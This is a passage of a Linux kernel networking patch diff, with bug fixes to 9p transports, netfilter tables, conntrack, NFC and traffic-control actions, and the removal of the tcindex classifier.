+@@ -499,7 +505,7 @@ dont_need_post_recv:
+ 
+ 	if (down_interruptible(&rdma->sq_sem)) {
+ 		err = -EINTR;
+-		goto send_error;
++		goto dma_unmap;
+ 	}
+ 
+ 	/* Mark request as `sent' *before* we actually send it,
+@@ -509,11 +515,14 @@ dont_need_post_recv:
+ 	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ 	err = ib_post_send(rdma->qp, &wr, NULL);
+ 	if (err)
+-		goto send_error;
++		goto dma_unmap;
+ 
+ 	/* Success */
+ 	return 0;
+ 
++dma_unmap:
++	ib_dma_unmap_single(rdma->cm_id->device, c->busa,
++			    c->req->tc.size, DMA_TO_DEVICE);
+  /* Handle errors that happened during or while preparing the send: */
+  send_error:
+ 	WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index 82c7005ede656..c64050e839ac6 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -372,19 +372,24 @@ out:
+ 	return ret;
+ }
+ 
+-static int xen_9pfs_front_probe(struct xenbus_device *dev,
+-				const struct xenbus_device_id *id)
++static int xen_9pfs_front_init(struct xenbus_device *dev)
+ {
+ 	int ret, i;
+ 	struct xenbus_transaction xbt;
+-	struct xen_9pfs_front_priv *priv = NULL;
+-	char *versions;
++	struct xen_9pfs_front_priv *priv = dev_get_drvdata(&dev->dev);
++	char *versions, *v;
+ 	unsigned int max_rings, max_ring_order, len = 0;
+ 
+ 	versions = xenbus_read(XBT_NIL, dev->otherend, "versions", &len);
+ 	if (IS_ERR(versions))
+ 		return PTR_ERR(versions);
+-	if (strcmp(versions, "1")) {
++	for (v = versions; *v; v++) {
++		if (simple_strtoul(v, &v, 10) == 1) {
++			v = NULL;
++			break;
++		}
++	}
++	if (v) {
+ 		kfree(versions);
+ 		return -EINVAL;
+ 	}
+@@ -399,11 +404,6 @@ static int xen_9pfs_front_probe(struct xenbus_device *dev,
+ 	if (p9_xen_trans.maxsize > XEN_FLEX_RING_SIZE(max_ring_order))
+ 		p9_xen_trans.maxsize = XEN_FLEX_RING_SIZE(max_ring_order) / 2;
+ 
+-	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
+-
+-	priv->dev = dev;
+ 	priv->num_rings = XEN_9PFS_NUM_RINGS;
+ 	priv->rings = kcalloc(priv->num_rings, sizeof(*priv->rings),
+ 			      GFP_KERNEL);
+@@ -462,23 +462,35 @@ static int xen_9pfs_front_probe(struct xenbus_device *dev,
+ 		goto error;
+ 	}
+ 
+-	write_lock(&xen_9pfs_lock);
+-	list_add_tail(&priv->list, &xen_9pfs_devs);
+-	write_unlock(&xen_9pfs_lock);
+-	dev_set_drvdata(&dev->dev, priv);
+-	xenbus_switch_state(dev, XenbusStateInitialised);
+-
+ 	return 0;
+ 
+  error_xenbus:
+ 	xenbus_transaction_end(xbt, 1);
+ 	xenbus_dev_fatal(dev, ret, "writing xenstore");
+  error:
+-	dev_set_drvdata(&dev->dev, NULL);
+ 	xen_9pfs_front_free(priv);
+ 	return ret;
+ }
+ 
++static int xen_9pfs_front_probe(struct xenbus_device *dev,
++				const struct xenbus_device_id *id)
++{
++	struct xen_9pfs_front_priv *priv = NULL;
++
++	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
++	if (!priv)
++		return -ENOMEM;
++
++	priv->dev = dev;
++	dev_set_drvdata(&dev->dev, priv);
++
++	write_lock(&xen_9pfs_lock);
++	list_add_tail(&priv->list, &xen_9pfs_devs);
++	write_unlock(&xen_9pfs_lock);
++
++	return 0;
++}
++
+ static int xen_9pfs_front_resume(struct xenbus_device *dev)
+ {
+ 	dev_warn(&dev->dev, "suspend/resume unsupported\n");
+@@ -497,6 +509,8 @@ static void xen_9pfs_front_changed(struct xenbus_device *dev,
+ 		break;
+ 
+ 	case XenbusStateInitWait:
++		if (!xen_9pfs_front_init(dev))
++			xenbus_switch_state(dev, XenbusStateInitialised);
+ 		break;
+ 
+ 	case XenbusStateConnected:
+diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c
+index ce5dfa3babd26..757ec46fc45a0 100644
+--- a/net/bridge/netfilter/ebtables.c
++++ b/net/bridge/netfilter/ebtables.c
+@@ -1090,7 +1090,7 @@ static int do_replace_finish(struct net *net, struct ebt_replace *repl,
+ 
+ 	audit_log_nfcfg(repl->name, AF_BRIDGE, repl->nentries,
+ 			AUDIT_XT_OP_REPLACE, GFP_KERNEL);
+-	return ret;
++	return 0;
+ 
+ free_unlock:
+ 	mutex_unlock(&ebt_mutex);
+diff --git a/net/core/dev.c b/net/core/dev.c
+index f23e287602b7e..fce980d531bdc 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3131,8 +3131,10 @@ void __dev_kfree_skb_any(struct sk_buff *skb, enum skb_free_reason reason)
+ {
+ 	if (in_hardirq() || irqs_disabled())
+ 		__dev_kfree_skb_irq(skb, reason);
++	else if (unlikely(reason == SKB_REASON_DROPPED))
++		kfree_skb(skb);
+ 	else
+-		dev_kfree_skb(skb);
++		consume_skb(skb);
+ }
+ EXPORT_SYMBOL(__dev_kfree_skb_any);
+ 
+diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
+index ffc0cab7cf189..2407066b0fec1 100644
+--- a/net/ipv4/netfilter/arp_tables.c
++++ b/net/ipv4/netfilter/arp_tables.c
+@@ -1525,6 +1525,10 @@ int arpt_register_table(struct net *net,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct arpt_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
+index 2ed7c58b471ac..da5998011ab9b 100644
+--- a/net/ipv4/netfilter/ip_tables.c
++++ b/net/ipv4/netfilter/ip_tables.c
+@@ -1045,7 +1045,6 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 	struct xt_counters *counters;
+ 	struct ipt_entry *iter;
+ 
+-	ret = 0;
+ 	counters = xt_counters_alloc(num_counters);
+ 	if (!counters) {
+ 		ret = -ENOMEM;
+@@ -1091,7 +1090,7 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 		net_warn_ratelimited("iptables: counters copy to user failed while replacing table\n");
+ 	}
+ 	vfree(counters);
+-	return ret;
++	return 0;
+ 
+  put_module:
+ 	module_put(t->me);
+@@ -1742,6 +1741,10 @@ int ipt_register_table(struct net *net, const struct xt_table *table,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct ipt_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index e002f2e1d4f2d..9a7ef7732c24c 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -597,6 +597,9 @@ EXPORT_SYMBOL(tcp_create_openreq_child);
+  * validation and inside tcp_v4_reqsk_send_ack(). Can we do better?
+  *
+  * We don't need to initialize tmp_opt.sack_ok as we don't use the results
++ *
++ * Note: If @fastopen is true, this can be called from process context.
++ *       Otherwise, this is from BH context.
+  */
+ 
+ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+@@ -748,7 +751,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 					  &tcp_rsk(req)->last_oow_ack_time))
+ 			req->rsk_ops->send_ack(sk, skb, req);
+ 		if (paws_reject)
+-			__NET_INC_STATS(sock_net(sk), LINUX_MIB_PAWSESTABREJECTED);
++			NET_INC_STATS(sock_net(sk), LINUX_MIB_PAWSESTABREJECTED);
+ 		return NULL;
+ 	}
+ 
+@@ -767,7 +770,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 	 *	   "fourth, check the SYN bit"
+ 	 */
+ 	if (flg & (TCP_FLAG_RST|TCP_FLAG_SYN)) {
+-		__TCP_INC_STATS(sock_net(sk), TCP_MIB_ATTEMPTFAILS);
++		TCP_INC_STATS(sock_net(sk), TCP_MIB_ATTEMPTFAILS);
+ 		goto embryonic_reset;
+ 	}
+ 
+diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
+index 2d816277f2c5a..0ce0ed17c7583 100644
+--- a/net/ipv6/netfilter/ip6_tables.c
++++ b/net/ipv6/netfilter/ip6_tables.c
+@@ -1062,7 +1062,6 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 	struct xt_counters *counters;
+ 	struct ip6t_entry *iter;
+ 
+-	ret = 0;
+ 	counters = xt_counters_alloc(num_counters);
+ 	if (!counters) {
+ 		ret = -ENOMEM;
+@@ -1108,7 +1107,7 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 		net_warn_ratelimited("ip6tables: counters copy to user failed while replacing table\n");
+ 	}
+ 	vfree(counters);
+-	return ret;
++	return 0;
+ 
+  put_module:
+ 	module_put(t->me);
+@@ -1751,6 +1750,10 @@ int ip6t_register_table(struct net *net, const struct xt_table *table,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct ip6t_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv6/netfilter/ip6t_rpfilter.c b/net/ipv6/netfilter/ip6t_rpfilter.c
+index a01d9b842bd07..67c87a88cde4f 100644
+--- a/net/ipv6/netfilter/ip6t_rpfilter.c
++++ b/net/ipv6/netfilter/ip6t_rpfilter.c
+@@ -72,7 +72,9 @@ static bool rpfilter_lookup_reverse6(struct net *net, const struct sk_buff *skb,
+ 		goto out;
+ 	}
+ 
+-	if (rt->rt6i_idev->dev == dev || (flags & XT_RPFILTER_LOOSE))
++	if (rt->rt6i_idev->dev == dev ||
++	    l3mdev_master_ifindex_rcu(rt->rt6i_idev->dev) == dev->ifindex ||
++	    (flags & XT_RPFILTER_LOOSE))
+ 		ret = true;
+  out:
+ 	ip6_rt_put(rt);
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index e74e0361fd921..a6983a13dd205 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -5540,16 +5540,17 @@ static size_t rt6_nlmsg_size(struct fib6_info *f6i)
+ 		nexthop_for_each_fib6_nh(f6i->nh, rt6_nh_nlmsg_size,
+ 					 &nexthop_len);
+ 	} else {
++		struct fib6_info *sibling, *next_sibling;
+ 		struct fib6_nh *nh = f6i->fib6_nh;
+ 
+ 		nexthop_len = 0;
+ 		if (f6i->fib6_nsiblings) {
+-			nexthop_len = nla_total_size(0)	 /* RTA_MULTIPATH */
+-				    + NLA_ALIGN(sizeof(struct rtnexthop))
+-				    + nla_total_size(16) /* RTA_GATEWAY */
+-				    + lwtunnel_get_encap_size(nh->fib_nh_lws);
++			rt6_nh_nlmsg_size(nh, &nexthop_len);
+ 
+-			nexthop_len *= f6i->fib6_nsiblings;
++			list_for_each_entry_safe(sibling, next_sibling,
++						 &f6i->fib6_siblings, fib6_siblings) {
++				rt6_nh_nlmsg_size(sibling->fib6_nh, &nexthop_len);
++			}
+ 		}
+ 		nexthop_len += lwtunnel_get_encap_size(nh->fib_nh_lws);
+ 	}
+diff --git a/net/netfilter/core.c b/net/netfilter/core.c
+index 5a6705a0e4ecf..6e80f0f6149ea 100644
+--- a/net/netfilter/core.c
++++ b/net/netfilter/core.c
+@@ -669,6 +669,9 @@ const struct nf_ct_hook __rcu *nf_ct_hook __read_mostly;
+ EXPORT_SYMBOL_GPL(nf_ct_hook);
+ 
+ #if IS_ENABLED(CONFIG_NF_CONNTRACK)
++u8 nf_ctnetlink_has_listener;
++EXPORT_SYMBOL_GPL(nf_ctnetlink_has_listener);
++
+ const struct nf_nat_hook __rcu *nf_nat_hook __read_mostly;
+ EXPORT_SYMBOL_GPL(nf_nat_hook);
+ 
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index 24002bc61e07e..e1af14e3b63c5 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -381,7 +381,6 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
+-	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+ 		nf_conntrack_free(nfct);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 496c4920505b3..ead11a9c261f3 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -886,10 +886,8 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 
+ 	zone = nf_ct_zone(ct);
+ 
+-	if (!nf_ct_ext_valid_pre(ct->ext)) {
+-		NF_CT_STAT_INC_ATOMIC(net, insert_failed);
+-		return -ETIMEDOUT;
+-	}
++	if (!nf_ct_ext_valid_pre(ct->ext))
++		return -EAGAIN;
+ 
+ 	local_bh_disable();
+ 	do {
+@@ -924,6 +922,19 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 			goto chaintoolong;
+ 	}
+ 
++	/* If genid has changed, we can't insert anymore because ct
++	 * extensions could have stale pointers and nf_ct_iterate_destroy
++	 * might have completed its table scan already.
++	 *
++	 * Increment of the ext genid right after this check is fine:
++	 * nf_ct_iterate_destroy blocks until locks are released.
++	 */
++	if (!nf_ct_ext_valid_post(ct->ext)) {
++		err = -EAGAIN;
++		goto out;
++	}
++
++	ct->status |= IPS_CONFIRMED;
+ 	smp_wmb();
+ 	/* The caller holds a reference to this object */
+ 	refcount_set(&ct->ct_general.use, 2);
+@@ -932,12 +943,6 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 	NF_CT_STAT_INC(net, insert);
+ 	local_bh_enable();
+ 
+-	if (!nf_ct_ext_valid_post(ct->ext)) {
+-		nf_ct_kill(ct);
+-		NF_CT_STAT_INC_ATOMIC(net, drop);
+-		return -ETIMEDOUT;
+-	}
+-
+ 	return 0;
+ chaintoolong:
+ 	NF_CT_STAT_INC(net, chaintoolong);
+diff --git a/net/netfilter/nf_conntrack_ecache.c b/net/netfilter/nf_conntrack_ecache.c
+index 8698b34246460..69948e1d6974e 100644
+--- a/net/netfilter/nf_conntrack_ecache.c
++++ b/net/netfilter/nf_conntrack_ecache.c
+@@ -309,7 +309,7 @@ bool nf_ct_ecache_ext_add(struct nf_conn *ct, u16 ctmask, u16 expmask, gfp_t gfp
+ 			break;
+ 		return true;
+ 	case 2: /* autodetect: no event listener, don't allocate extension. */
+-		if (!READ_ONCE(net->ct.ctnetlink_has_listener))
++		if (!READ_ONCE(nf_ctnetlink_has_listener))
+ 			return true;
+ 		fallthrough;
+ 	case 1:
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 1286ae7d46096..733bb56950c14 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -2316,9 +2316,6 @@ ctnetlink_create_conntrack(struct net *net,
+ 	nfct_seqadj_ext_add(ct);
+ 	nfct_synproxy_ext_add(ct);
+ 
+-	/* we must add conntrack extensions before confirmation. */
+-	ct->status |= IPS_CONFIRMED;
+-
+ 	if (cda[CTA_STATUS]) {
+ 		err = ctnetlink_change_status(ct, cda);
+ 		if (err < 0)
+@@ -2375,12 +2372,15 @@ ctnetlink_create_conntrack(struct net *net,
+ 
+ 	err = nf_conntrack_hash_check_insert(ct);
+ 	if (err < 0)
+-		goto err2;
++		goto err3;
+ 
+ 	rcu_read_unlock();
+ 
+ 	return ct;
+ 
++err3:
++	if (ct->master)
++		nf_ct_put(ct->master);
+ err2:
+ 	rcu_read_unlock();
+ err1:
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index fc8256b00b320..6023c9f72cdca 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5487,7 +5487,7 @@ static int nf_tables_getsetelem(struct sk_buff *skb,
+ 	int rem, err = 0;
+ 
+ 	table = nft_table_lookup(net, nla[NFTA_SET_ELEM_LIST_TABLE], family,
+-				 genmask, NETLINK_CB(skb).portid);
++				 genmask, 0);
+ 	if (IS_ERR(table)) {
+ 		NL_SET_BAD_ATTR(extack, nla[NFTA_SET_ELEM_LIST_TABLE]);
+ 		return PTR_ERR(table);
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index 6d18fb3468683..81c7737c803a6 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -29,6 +29,7 @@
+ 
+ #include <net/netlink.h>
+ #include <net/netns/generic.h>
++#include <linux/netfilter.h>
+ #include <linux/netfilter/nfnetlink.h>
+ 
+ MODULE_LICENSE("GPL");
+@@ -685,12 +686,12 @@ static void nfnetlink_bind_event(struct net *net, unsigned int group)
+ 	group_bit = (1 << group);
+ 
+ 	spin_lock(&nfnl_grp_active_lock);
+-	v = READ_ONCE(net->ct.ctnetlink_has_listener);
++	v = READ_ONCE(nf_ctnetlink_has_listener);
+ 	if ((v & group_bit) == 0) {
+ 		v |= group_bit;
+ 
+ 		/* read concurrently without nfnl_grp_active_lock held. */
+-		WRITE_ONCE(net->ct.ctnetlink_has_listener, v);
++		WRITE_ONCE(nf_ctnetlink_has_listener, v);
+ 	}
+ 
+ 	spin_unlock(&nfnl_grp_active_lock);
+@@ -744,12 +745,12 @@ static void nfnetlink_unbind(struct net *net, int group)
+ 
+ 	spin_lock(&nfnl_grp_active_lock);
+ 	if (!nfnetlink_has_listeners(net, group)) {
+-		u8 v = READ_ONCE(net->ct.ctnetlink_has_listener);
++		u8 v = READ_ONCE(nf_ctnetlink_has_listener);
+ 
+ 		v &= ~group_bit;
+ 
+ 		/* read concurrently without nfnl_grp_active_lock held. */
+-		WRITE_ONCE(net->ct.ctnetlink_has_listener, v);
++		WRITE_ONCE(nf_ctnetlink_has_listener, v);
+ 	}
+ 	spin_unlock(&nfnl_grp_active_lock);
+ #endif
+diff --git a/net/netfilter/xt_length.c b/net/netfilter/xt_length.c
+index 1873da3a945ab..9fbfad13176f0 100644
+--- a/net/netfilter/xt_length.c
++++ b/net/netfilter/xt_length.c
+@@ -30,8 +30,7 @@ static bool
+ length_mt6(const struct sk_buff *skb, struct xt_action_param *par)
+ {
+ 	const struct xt_length_info *info = par->matchinfo;
+-	const u_int16_t pktlen = ntohs(ipv6_hdr(skb)->payload_len) +
+-				 sizeof(struct ipv6hdr);
++	u32 pktlen = skb->len;
+ 
+ 	return (pktlen >= info->min && pktlen <= info->max) ^ info->invert;
+ }
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 1fc339084d897..348bf561bc9fb 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1442,7 +1442,11 @@ static int nfc_se_io(struct nfc_dev *dev, u32 se_idx,
+ 	rc = dev->ops->se_io(dev, se_idx, apdu,
+ 			apdu_length, cb, cb_context);
+ 
++	device_unlock(&dev->dev);
++	return rc;
++
+ error:
++	kfree(cb_context);
+ 	device_unlock(&dev->dev);
+ 	return rc;
+ }
+diff --git a/net/sched/Kconfig b/net/sched/Kconfig
+index 777d6b50505cc..03a5abf1a3dae 100644
+--- a/net/sched/Kconfig
++++ b/net/sched/Kconfig
+@@ -503,17 +503,6 @@ config NET_CLS_BASIC
+ 	  To compile this code as a module, choose M here: the
+ 	  module will be called cls_basic.
+ 
+-config NET_CLS_TCINDEX
+-	tristate "Traffic-Control Index (TCINDEX)"
+-	select NET_CLS
+-	help
+-	  Say Y here if you want to be able to classify packets based on
+-	  traffic control indices. You will want this feature if you want
+-	  to implement Differentiated Services together with DSMARK.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called cls_tcindex.
+-
+ config NET_CLS_ROUTE4
+ 	tristate "Routing decision (ROUTE)"
+ 	depends on INET
+diff --git a/net/sched/Makefile b/net/sched/Makefile
+index dd14ef413fdad..b7dbac5c519f6 100644
+--- a/net/sched/Makefile
++++ b/net/sched/Makefile
+@@ -70,7 +70,6 @@ obj-$(CONFIG_NET_CLS_U32)	+= cls_u32.o
+ obj-$(CONFIG_NET_CLS_ROUTE4)	+= cls_route.o
+ obj-$(CONFIG_NET_CLS_FW)	+= cls_fw.o
+ obj-$(CONFIG_NET_CLS_RSVP)	+= cls_rsvp.o
+-obj-$(CONFIG_NET_CLS_TCINDEX)	+= cls_tcindex.o
+ obj-$(CONFIG_NET_CLS_RSVP6)	+= cls_rsvp6.o
+ obj-$(CONFIG_NET_CLS_BASIC)	+= cls_basic.o
+ obj-$(CONFIG_NET_CLS_FLOW)	+= cls_flow.o
+diff --git a/net/sched/act_mpls.c b/net/sched/act_mpls.c
+index 6b26bdb999d77..809f7928a1be6 100644
+--- a/net/sched/act_mpls.c
++++ b/net/sched/act_mpls.c
+@@ -190,40 +190,67 @@ static int tcf_mpls_init(struct net *net, struct nlattr *nla,
+ 	parm = nla_data(tb[TCA_MPLS_PARMS]);
+ 	index = parm->index;
+ 
++	err = tcf_idr_check_alloc(tn, &index, a, bind);
++	if (err < 0)
++		return err;
++	exists = err;
++	if (exists && bind)
++		return 0;
++
++	if (!exists) {
++		ret = tcf_idr_create(tn, index, est, a, &act_mpls_ops, bind,
++				     true, flags);
++		if (ret) {
++			tcf_idr_cleanup(tn, index);
++			return ret;
++		}
++
++		ret = ACT_P_CREATED;
++	} else if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
++		tcf_idr_release(*a, bind);
++		return -EEXIST;
++	}
++
+ 	/* Verify parameters against action type. */
+ 	switch (parm->m_action) {
+ 	case TCA_MPLS_ACT_POP:
+ 		if (!tb[TCA_MPLS_PROTO]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol must be set for MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (!eth_proto_is_802_3(nla_get_be16(tb[TCA_MPLS_PROTO]))) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Invalid protocol type for MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (tb[TCA_MPLS_LABEL] || tb[TCA_MPLS_TTL] || tb[TCA_MPLS_TC] ||
+ 		    tb[TCA_MPLS_BOS]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label, TTL, TC or BOS cannot be used with MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	case TCA_MPLS_ACT_DEC_TTL:
+ 		if (tb[TCA_MPLS_PROTO] || tb[TCA_MPLS_LABEL] ||
+ 		    tb[TCA_MPLS_TTL] || tb[TCA_MPLS_TC] || tb[TCA_MPLS_BOS]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label, TTL, TC, BOS or protocol cannot be used with MPLS dec_ttl");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	case TCA_MPLS_ACT_PUSH:
+ 	case TCA_MPLS_ACT_MAC_PUSH:
+ 		if (!tb[TCA_MPLS_LABEL]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label is required for MPLS push");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (tb[TCA_MPLS_PROTO] &&
+ 		    !eth_p_mpls(nla_get_be16(tb[TCA_MPLS_PROTO]))) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol must be an MPLS type for MPLS push");
+-			return -EPROTONOSUPPORT;
++			err = -EPROTONOSUPPORT;
++			goto release_idr;
+ 		}
+ 		/* Push needs a TTL - if not specified, set a default value. */
+ 		if (!tb[TCA_MPLS_TTL]) {
+@@ -238,33 +265,14 @@ static int tcf_mpls_init(struct net *net, struct nlattr *nla,
+ 	case TCA_MPLS_ACT_MODIFY:
+ 		if (tb[TCA_MPLS_PROTO]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol cannot be used with MPLS modify");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	default:
+ 		NL_SET_ERR_MSG_MOD(extack, "Unknown MPLS action");
+-		return -EINVAL;
+-	}
+-
+-	err = tcf_idr_check_alloc(tn, &index, a, bind);
+-	if (err < 0)
+-		return err;
+-	exists = err;
+-	if (exists && bind)
+-		return 0;
+-
+-	if (!exists) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_mpls_ops, bind, true, flags);
+-		if (ret) {
+-			tcf_idr_cleanup(tn, index);
+-			return ret;
+-		}
+-
+-		ret = ACT_P_CREATED;
+-	} else if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
+-		tcf_idr_release(*a, bind);
+-		return -EEXIST;
++		err = -EINVAL;
++		goto release_idr;
+ 	}
+ 
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+diff --git a/net/sched/act_pedit.c b/net/sched/act_pedit.c
+index a0378e9f01213..7532773283ea7 100644
+--- a/net/sched/act_pedit.c
++++ b/net/sched/act_pedit.c
+@@ -134,6 +134,17 @@ nla_failure:
+ 	return -EINVAL;
+ }
+ 
++static void tcf_pedit_cleanup_rcu(struct rcu_head *head)
++{
++	struct tcf_pedit_parms *parms =
++		container_of(head, struct tcf_pedit_parms, rcu);
++
++	kfree(parms->tcfp_keys_ex);
++	kfree(parms->tcfp_keys);
++
++	kfree(parms);
++}
++
+ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ 			  struct nlattr *est, struct tc_action **a,
+ 			  struct tcf_proto *tp, u32 flags,
+@@ -141,10 +152,9 @@ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ {
+ 	struct tc_action_net *tn = net_generic(net, act_pedit_ops.net_id);
+ 	bool bind = flags & TCA_ACT_FLAGS_BIND;
+-	struct nlattr *tb[TCA_PEDIT_MAX + 1];
+ 	struct tcf_chain *goto_ch = NULL;
+-	struct tc_pedit_key *keys = NULL;
+-	struct tcf_pedit_key_ex *keys_ex;
++	struct tcf_pedit_parms *oparms, *nparms;
++	struct nlattr *tb[TCA_PEDIT_MAX + 1];
+ 	struct tc_pedit *parm;
+ 	struct nlattr *pattr;
+ 	struct tcf_pedit *p;
+@@ -171,109 +181,125 @@ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ 	}
+ 
+ 	parm = nla_data(pattr);
+-	if (!parm->nkeys) {
+-		NL_SET_ERR_MSG_MOD(extack, "Pedit requires keys to be passed");
+-		return -EINVAL;
+-	}
+-	ksize = parm->nkeys * sizeof(struct tc_pedit_key);
+-	if (nla_len(pattr) < sizeof(*parm) + ksize) {
+-		NL_SET_ERR_MSG_ATTR(extack, pattr, "Length of TCA_PEDIT_PARMS or TCA_PEDIT_PARMS_EX pedit attribute is invalid");
+-		return -EINVAL;
+-	}
+-
+-	keys_ex = tcf_pedit_keys_ex_parse(tb[TCA_PEDIT_KEYS_EX], parm->nkeys);
+-	if (IS_ERR(keys_ex))
+-		return PTR_ERR(keys_ex);
+ 
+ 	index = parm->index;
+ 	err = tcf_idr_check_alloc(tn, &index, a, bind);
+ 	if (!err) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_pedit_ops, bind, false, flags);
++		ret = tcf_idr_create_from_flags(tn, index, est, a,
++						&act_pedit_ops, bind, flags);
+ 		if (ret) {
+ 			tcf_idr_cleanup(tn, index);
+-			goto out_free;
++			return ret;
+ 		}
+ 		ret = ACT_P_CREATED;
+ 	} else if (err > 0) {
+ 		if (bind)
+-			goto out_free;
++			return 0;
+ 		if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
+ 			ret = -EEXIST;
+ 			goto out_release;
+ 		}
+ 	} else {
+-		ret = err;
++		return err;
++	}
++
++	if (!parm->nkeys) {
++		NL_SET_ERR_MSG_MOD(extack, "Pedit requires keys to be passed");
++		ret = -EINVAL;
++		goto out_release;
++	}
++	ksize = parm->nkeys * sizeof(struct tc_pedit_key);
++	if (nla_len(pattr) < sizeof(*parm) + ksize) {
++		NL_SET_ERR_MSG_ATTR(extack, pattr, "Length of TCA_PEDIT_PARMS or TCA_PEDIT_PARMS_EX pedit attribute is invalid");
++		ret = -EINVAL;
++		goto out_release;
++	}
++
++	nparms = kzalloc(sizeof(*nparms), GFP_KERNEL);
++	if (!nparms) {
++		ret = -ENOMEM;
++		goto out_release;
++	}
++
++	nparms->tcfp_keys_ex =
++		tcf_pedit_keys_ex_parse(tb[TCA_PEDIT_KEYS_EX], parm->nkeys);
++	if (IS_ERR(nparms->tcfp_keys_ex)) {
++		ret = PTR_ERR(nparms->tcfp_keys_ex);
+ 		goto out_free;
+ 	}
+ 
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+ 	if (err < 0) {
+ 		ret = err;
+-		goto out_release;
++		goto out_free_ex;
+ 	}
